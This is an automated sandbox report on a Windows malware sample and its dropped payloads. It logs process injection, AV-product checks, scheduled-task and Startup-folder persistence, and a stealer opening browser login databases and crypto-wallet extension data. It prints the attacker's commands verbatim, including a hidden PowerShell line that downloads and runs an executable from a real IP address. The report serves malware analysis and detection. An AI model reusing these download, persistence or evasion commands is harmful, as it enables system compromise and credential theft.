                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96BF68
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96BFCC
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96C030
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96C094
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96C0F8
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96C15C
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96C1C0
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96C224
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96C288
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.comMemory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96C2EC
Source: C:\Users\user\Desktop\random.exe | Code function: 0_2_00481201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00481201
Source: C:\Users\user\Desktop\random.exe | Code function: 0_2_00462BA5 KiUserCallbackDispatcher,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00462BA5
Source: C:\Users\user\Desktop\random.exe | Code function: 0_2_0048B226 SendInput,keybd_event,0_2_0048B226
Source: C:\Users\user\Desktop\random.exe | Code function: 0_2_004A22DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,0_2_004A22DA
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn zhvFsmabDCl /tr "mshta C:\Users\user\AppData\Local\Temp\tmxzSk7p3.hta" /sc minute /mo 25 /ru "user" /f
Source: C:\Windows\SysWOW64\mshta.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE "C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE"
Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE "C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE"
Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE | Process created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe "C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe"
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Process created: C:\Users\user\AppData\Local\Temp\10141760101\ReK7Ewx.exe "C:\Users\user\AppData\Local\Temp\10141760101\ReK7Ewx.exe"
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Process created: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exe "C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exe"
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\10141760101\ReK7Ewx.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c expand Ae.msi Ae.msi.bat & Ae.msi.bat
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\expand.exe expand Ae.msi Ae.msi.bat
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr "bdservicehost AvastUI AVGUI nsWscSvc ekrn SophosHealth"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 789919
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Deviation.msi
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "Brian" Challenges
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 789919\Occupation.com + Kate + Invisible + Tells + Gross + Amend + Foul + Snowboard + Digital + Fraud 789919\Occupation.com
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Drug.msi + ..\Contributors.msi + ..\Anthropology.msi + ..\Activities.msi + ..\Opens.msi + ..\Having.msi + ..\Dimension.msi + ..\Responding.msi + ..\Series.msi + ..\Salem.msi q
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\789919\Occupation.com Occupation.com q
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com | Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Consider" /tr "wscript //B 'C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.js'" /sc minute /mo 5 /F
Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exe | Process created: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exe "C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exe"
Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exe | Process created: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exe "C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exe"
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com | Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\edugeniusx.url" & echo url="c:\users\user\appdata\local\edugenius studios co\edugeniusx.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\edugeniusx.url" & exit
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com | Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\edugeniusx.url" & echo url="c:\users\user\appdata\local\edugenius studios co\edugeniusx.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\edugeniusx.url" & exit
Source: C:\Users\user\Desktop\random.exe | Code function: 0_2_00480B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_00480B62
Source: C:\Users\user\Desktop\random.exe | Code function: 0_2_00481663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00481663
Source: random.exe, Snowboard.37.dr, EduGeniusX.com.41.dr | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: random.exe | Binary or memory string: Shell_TrayWnd
Source: rapes.exe, rapes.exe, 0000000E.00000002.3642183042.0000000000233000.00000040.00000001.01000000.00000011.sdmp, rapes.exe, 00000016.00000002.1699197808.0000000000233000.00000040.00000001.01000000.00000011.sdmp, rapes.exe, 00000019.00000002.2294579206.0000000000233000.00000040.00000001.01000000.00000011.sdmp | Binary or memory string: |Program Manager
Source: C:\Users\user\Desktop\random.exe | Code function: 0_2_00440698 cpuid 0_2_00440698
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\10141760101\ReK7Ewx.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\10141760101\ReK7Ewx.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\10141780101\yUI6F6C.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\10141780101\yUI6F6C.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\10141790101\ADFoyxP.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\10141800101\zY9sqWs.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\10141800101\zY9sqWs.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\10141810101\CgmaT61.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\10141810101\CgmaT61.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\10141820101\mAtJWNv.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\10141820101\mAtJWNv.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\10141830101\PfOHmro.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\10141830101\PfOHmro.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\random.exe | Code function: 0_2_0047D21C GetLocalTime,0_2_0047D21C
Source: C:\Users\user\Desktop\random.exe | Code function: 0_2_0047D27A GetUserNameW,0_2_0047D27A
Source: C:\Users\user\Desktop\random.exe | Code function: 0_2_0045B952 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,0_2_0045B952
Source: C:\Users\user\Desktop\random.exe | Code function: 0_2_004242DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_004242DE
Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: Amcache.hve.54.dr | Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.54.dr | Binary or memory string: msmpeng.exe
Source: Amcache.hve.54.dr | Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.54.dr | Binary or memory string: MsMpEng.exe
                                    Source: V0Bt74c.exe, 00000033.00000002.3542112240.0000000000FE6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \Windows Defender\MsMpeng.exe
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                                    Stealing of Sensitive Information

                                    Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                                    Source: Yara matchFile source: 0000000D.00000002.1315277823.0000000000031000.00000040.00000001.01000000.00000011.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 0000000D.00000003.1272817646.0000000004830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 0000000B.00000002.1267517499.0000000000311000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 0000000C.00000002.1304814909.0000000000311000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000016.00000003.1658838706.0000000004850000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 0000001B.00000003.2852612840.00000000050F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 0000000E.00000002.3640463719.0000000000031000.00000040.00000001.01000000.00000011.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000019.00000002.2294441553.0000000000031000.00000040.00000001.01000000.00000011.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 0000001B.00000002.2894622115.0000000000031000.00000040.00000001.01000000.00000011.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 0000000C.00000003.1251271116.0000000004B30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 0000000B.00000003.1226965278.0000000004A10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000019.00000003.2254111649.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 0000000E.00000003.1272781808.0000000004CA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000016.00000002.1699111613.0000000000031000.00000040.00000001.01000000.00000011.sdmp, type: MEMORY
                                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\zY9sqWs[1].exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\10141800101\zY9sqWs.exe, type: DROPPED
                                    Source: Yara matchFile source: Process Memory Space: V0Bt74c.exe PID: 4860, type: MEMORYSTR
                                    Source: Yara matchFile source: 51.2.V0Bt74c.exe.400000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 49.2.V0Bt74c.exe.3549550.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 51.2.V0Bt74c.exe.400000.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 00000033.00000002.3513079723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000031.00000002.3270950302.0000000003549000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mAtJWNv[1].exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\10141820101\mAtJWNv.exe, type: DROPPED
                                    Source: Yara matchFile source: dump.pcap, type: PCAP
                                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mAtJWNv[1].exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\10141820101\mAtJWNv.exe, type: DROPPED
                                    Source: V0Bt74c.exe, 00000033.00000002.3541523690.0000000000F8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Electrum-LTC
                                    Source: V0Bt74c.exe, 00000033.00000002.3541523690.0000000000F8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/ElectronCash
                                    Source: V0Bt74c.exe, 00000033.00000002.3541523690.0000000000F8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
                                    Source: V0Bt74c.exe, 00000033.00000002.3541523690.0000000000F8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: pcgpfmipidbgpenhmajoajpbobppdil","ez":"Sui"},{"en":"aholpfdialjgjfhomihkjbmgjidlcdno","ez":"ExodusWeb3"}-
                                    Source: V0Bt74c.exe, 00000033.00000002.3541523690.0000000000F8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Ethereum
                                    Source: powershell.exe, 00000005.00000002.1221252142.0000000007660000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: sqlcolumnencryptionkeystoreprovider
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
